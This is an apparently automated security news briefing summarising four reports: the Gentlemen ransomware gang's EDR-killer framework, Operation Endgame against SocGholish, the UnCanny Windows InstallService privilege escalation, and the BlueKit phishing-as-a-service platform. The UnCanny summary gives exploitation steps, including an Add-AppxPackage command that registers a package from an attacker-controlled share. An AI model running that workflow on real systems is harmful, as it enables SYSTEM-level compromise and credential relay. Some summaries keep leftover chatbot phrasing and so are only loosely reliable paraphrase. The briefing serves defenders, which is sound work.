InfoSec Briefing - June 20, 2026

🎧 Audio Briefing

Playback Speed:

Cyber security developments for Saturday the 20th of June 2026 covering articles added to the BlueTeamSec community on infosec.pub. Today we have 4 articles to cover. All attribution is by the article authors. All article analysis is automated.

ESET have written up The Gentlemen ransomware gang's EDR-killing framework, which they call GentleKiller. What's notable here is that it's centrally managed and distributed to affiliates rather than each crew bringing their own tools, and they're weaponising BYOVD exploits within days of public disclosure. The group's been hitting organisations across Southeast Asia, South America, and Western Europe, often through vulnerable FortiGate configurations.

Dutch police have announced Operation Endgame, a disruption effort targeting the SocGholish malware group. They've identified nearly fifteen thousand compromised WordPress sites and are notifying owners with remediation guidance. SocGholish acts as an initial access broker, so this one's aimed at cutting off supply chains that feed ransomware attacks.

A researcher has disclosed UnCanny, a Windows privilege escalation technique that abuses the Windows Store InstallService to achieve SYSTEM-level execution from a non-admin account. It works by exploiting plugin loading via UNC paths when Developer Mode is enabled, allowing both machine-account NTLM relay and malicious DLL loading. There's also a persistence mechanism through work items that survives reboots, which is less than ideal.

CloudSEK have profiled BlueKit, a Phishing-as-a-Service platform that's lowering the barrier to entry for credential theft at scale. It runs on a subscription model with 87 different phishing kits, uses peer-to-peer rendering to evade detection, and includes real-time session cookie capture to bypass MFA. The platform also automates post-compromise workflows for account takeover, which makes it particularly effective against enterprise and financial targets.

That concludes today's briefing.

📰 Articles Covered

International law enforcement initiate hunt on malware group SocGholish - Dutch police (Politie)

The information provided in your summary covers the key points of the report regarding the international disruption of the SocGholish malware group as part of "Operation Endgame." Since you have already extracted the core elements of the announcement, I have reviewed the remaining content of the article to ensure no additional critical details were missed.

### Additional Context for Defenders
Beyond the actionable steps previously listed, law enforcement provided further guidance and resources that security teams and site owners should note:

* **Proactive Victim Notification:** Authorities are actively reaching out to owners of the 14,971 infected WordPress websites. Site owners are encouraged to monitor their communications and collaborate with local cybersecurity authorities if they receive an notification regarding a compromise.
* **Broadening the Scope:** The disruption is part of a larger, ongoing international effort targeting various high-level cybercriminal infrastructures. The operation highlights the necessity of international cooperation in combating "Initial Access Brokers" who facilitate widespread ransomware attacks.
* **Available Resources:** Law enforcement agencies, including the Dutch police and Europol, are providing guidance on how to secure compromised environments. Defenders should leverage these official channels for post-remediation steps and forensic cleanup.

If you are a WordPress administrator, in addition to the measures previously noted, it is recommended to conduct a full scan of your site's files for unauthorized scripts, as attackers may have placed backdoors beyond the initial compromised credentials.
UnCanny: Another new coercion primitive with LPE 0day - machine-account NTLM coercion from a non-admin user via Windows Store InstallService plugin resolution experiments - 0xHossam

The provided summary covers the key aspects of the 'UnCanny' research project. Here is the detailed precis requested:

### **What Happened**
The researcher discovered a security primitive that abuses the Windows Store install service (`InstallService.exe`), which operates with `NT AUTHORITY\SYSTEM` privileges. By exploiting the way the service loads plugins, a low-privileged user can force the service to interact with arbitrary file paths—including remote UNC paths—to facilitate NTLM relay attacks or achieve full system compromise.

### **Who is Affected**
The vulnerability specifically affects Windows systems where **Developer Mode** is enabled. This configuration is standard for many developers and engineers but is less common on restricted end-user workstations.

### **Security Implications**
* **NTLM Coercion:** By providing a non-existent UNC path, an attacker forces the system account to authenticate via SMB to that share, allowing the capture or relay of NTLM hashes.
* **Local Privilege Escalation (LPE):** If an attacker points the service to a malicious DLL hosted on a controlled SMB server, the service loads that code. Because the service runs as `SYSTEM`, the attacker’s payload executes with highest-level privileges.
* **Persistence:** The trigger mechanism writes a work item to disk, which the service will re-execute upon subsequent system reboots until the malicious package is removed, creating a persistent backdoor.

### **Technical Details**
* **Mechanism:** The vulnerability lies in the `PluginHelpers::ActivatePlugin` function within the `InstallService` component.
* **Exploitation Workflow:**
1. **Registration:** The user performs a "loose-file" registration of an Appx package pointing to a UNC share (`Add-AppxPackage -Register \\attacker\share\AppxManifest.xml`).
2. **Triggering:** The user initiates a work request via `CreateInstallServiceWork` using the package's family name.
3. **Execution:** The service incorrectly treats the package location as a path for `LoadLibraryW`, causing it to pull and execute the library from the remote attacker-controlled location.
* **Constraint:** This technique relies on the ability to perform loose-file registration of unsigned packages, which is only possible when Developer Mode is active.

### **What Defenders Should Know**
* **Primary Mitigation:** Disable Developer Mode on all production and end-user systems where it is not explicitly required for engineering workflows.
* **Monitoring & Detection:**
* **Activity Monitoring:** Audit the `InstallService` for unusual `LoadLibraryW` calls or unexpected network connections (especially outbound SMB connections to non-trusted shares).
* **Package Registration:** Monitor for unauthorized or suspicious use of `Add-AppxPackage` or `Register-AppxPackage` commands, particularly those pointing to non-local or UNC paths.
* **Strategic Defense:** The researcher identifies the current primitive as part of a broader class of issues. Defenders should be aware that similar behaviors might be achievable through other vectors, such as COM hijacking, the use of `-ExternalLocation` flags, or symlink manipulation, which remain active areas of research.
Bluekit Phishing as a Service (PhaaS) - CloudSEK

The analysis of the BlueKit Phishing-as-a-Service (PhaaS) platform reveals a highly organized and sophisticated ecosystem designed to lower the barrier for entry for threat actors while maximizing the success of phishing campaigns. Below is a detailed precis of the threat.

### What Happened
CloudSEK identified "BlueKit," a mature, commercial PhaaS platform operating on a subscription model. It functions as an automated cybercriminal ecosystem that allows users—regardless of their technical skill—to launch large-scale, high-fidelity phishing campaigns. The service is managed like a legitimate enterprise SaaS, complete with tiered subscription plans, AI-assisted customer support, and an affiliate program.

### Who Is Affected
BlueKit has a global reach, targeting high-value sectors and platforms. Specifically, it focuses on:
* **Enterprise/Cloud Services:** Microsoft, Google, GitHub, and IONOS.
* **Financial Institutions:** Various banking organizations across North America, Europe, and India.
* **Cryptocurrency:** Major exchanges like Binance and Coinbase, as well as hardware wallet users (e.g., Ledger, Trezor).
* **Social Media:** Platforms such as Meta, Instagram, WhatsApp, LinkedIn, and X/Twitter.

### Technical Details
* **Obfuscation & Evasion:** The platform uses a P2P phishing page rendering model to hide its backend, effectively evading standard network analysis and browser developer tools. It also integrates sophisticated anti-bot filters, cloaking mechanisms, and CAPTCHA-bypass services (e.g., CapSolver).
* **Functional Capabilities:** It offers 87 distinct phishing kits and includes a smishing module for bulk SMS distribution. Once a victim interacts with a phishing page, the platform enables automated post-compromise workflows, such as password resets and passkey enrollment.
* **Operational Infrastructure:** Communications and administration occur through encrypted channels (Telegram, Jabber/XMPP, PGP, and Tor). Payments are strictly in cryptocurrency to maintain anonymity.

### Security Implications
* **MFA Bypass:** By utilizing an Adversary-in-the-Middle (AitM) approach, BlueKit captures session cookies in real-time. This effectively defeats traditional SMS or app-based multi-factor authentication.
* **Persistence & Escalation:** The platform facilitates rapid account takeover and persistent access. This access can act as a foothold for more severe criminal activity, including lateral movement within corporate networks and the deployment of ransomware.
* **Market Proliferation:** The franchise-style model democratizes cybercrime, allowing even novice actors to execute enterprise-grade attacks.

### Recommendations for Defenders
* **Transition to Phishing-Resistant MFA:** Shift away from SMS or push-notification-based MFA toward hardware-based FIDO2 security keys, which are resistant to AitM interception.
* **Enhance Access Controls:** Deploy conditional access policies that mandate device compliance and verify that requests originate from trusted, managed devices.
* **Improve Session Management:** Tighten session policies by enforcing shorter token lifetimes and requiring re-authentication for sensitive or high-risk actions.
* **Security Awareness:** Educate users on the mechanics of modern social engineering, specifically highlighting the risks of smishing, deceptive CAPTCHA prompts, and fraudulent passkey requests.
Killing me gently: Inside Gentlemen’s EDR killer framework - ESET

The "Gentlemen" ransomware-as-a-service (RaaS) gang has emerged as one of the most active threat actors since early 2026. ESET Research recently published findings detailing the group’s sophisticated approach to defense evasion, specifically their centralized management of a robust suite of Endpoint Detection and Response (EDR) killing tools 【1】.

### What Happened
Unlike most RaaS operators that leave EDR-evasion to the discretion of their affiliates, the Gentlemen gang actively develops, maintains, and distributes a standardized "EDR-killer" toolset. They utilize an in-house framework dubbed **GentleKiller** alongside integrated third-party tools such as HexKiller, ThrottleBlood, and HavocKiller. The group is highly agile, often operationalizing new Bring Your Own Vulnerable Driver (BYOVD) exploits within days of their public disclosure 【1】.

### Who is Affected
The group maintains a geographically diverse victimology that is notably not US-centric. They frequently target organizations in Southeast Asia, South America, and Western Europe, including countries like Thailand, Brazil, and France. Victims are often selected based on vulnerable FortiGate configurations rather than specific geographical regions 【1】.

### Security Implications
This centralized model lowers the barrier to entry for affiliates and standardizes the attack process. By managing the EDR-killer lifecycle centrally, the operators ensure that all affiliates possess highly effective, "ready-to-use" tools. This increases the overall efficiency and success rate of their ransomware campaigns, as they can consistently disrupt security software across a broad range of target environments 【1】.

### Technical Details
* **GentleKiller Framework:** An internally developed tool with at least eight variants. It abuses various malicious or vulnerable drivers to disable security software. Despite surface-level differences in impersonation, these variants share a core development template featuring identical obfuscation and loop-based process termination 【1】.
* **Defense Evasion:** All tools undergo a standardized evasion layer after compilation. This includes:
* **Advanced Protection:** Application of Enigma or Themida binary protection.
* **Impersonation:** Files are renamed to mimic legitimate cybersecurity software, featuring fabricated version information, copied legitimate digital signatures, and matching icons 【1】.
* **Additional Tooling:** The group also utilizes *OxideHarvest*, a Rust-based credential stealer, which is maintained by one of their affiliates 【1】.

### What Defenders Should Know
* **Detection Vectors:** Defenders should monitor for the presence of the `GentlemenCollection` directory, where these tools are often staged.
* **Behavioral Indicators:** Because the tools share a common template, defenders can focus on behavioral anomalies, such as the consistent, loop-based termination of security processes.
* **Verification:** Always verify digital signatures and version information. The gang's reliance on "borrowed" or invalid certificates is a primary indicator of compromise.
* **Proactive Strategy:** Understanding the structure of the GentleKiller framework allows security teams to create defensive rules that remain effective even as the gang releases new variants using different drivers 【1】.